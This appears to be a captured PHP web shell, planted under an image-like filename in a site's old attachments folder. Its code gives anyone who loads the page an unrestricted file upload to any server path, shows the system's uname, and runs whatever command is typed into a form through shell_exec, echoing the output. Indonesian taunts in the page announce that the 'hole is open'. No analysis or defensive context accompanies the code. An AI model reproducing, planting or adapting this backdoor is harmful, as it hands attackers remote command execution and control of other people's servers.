Current Path : /home/meharicl/www/fait3-3/old_attachement/
Url:
Current File : /home/meharicl/www/fait3-3/old_attachement/41005.jpg.help.php

<?php $files = @$_FILES["files"];  if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<center><h3><a href='$fullpath'>Ex45 ngecrot disini!!</a></h3></center>"; } }echo '<center><html><head>Selamat LobangNya Udah Kebuka :V</head><body><form method=POST enctype="multipart/form-data" action=""><input type="file" name="files"><input type=submit value="Up"></form></body></html></center>'; ?>
<?php echo "<b>".php_uname()."</b><br>"; ?>
<center> <form method="POST" action=""> <input type="text" name="cmd" placeholder="Execute Commands"> <input type="submit" value=">>"> </form> <?php $cmd = $_POST['cmd']; $exec = shell_exec("$cmd"); echo "<textarea rows='15' cols='85'>$exec</textarea>"; ?>